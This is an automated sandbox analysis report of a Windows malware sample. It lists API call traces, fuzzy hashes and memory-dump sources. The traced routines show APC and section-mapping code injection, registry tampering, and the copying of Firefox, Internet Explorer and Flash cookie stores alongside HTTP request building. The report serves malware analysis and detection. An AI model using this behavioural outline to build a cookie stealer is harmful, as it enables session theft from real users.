    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
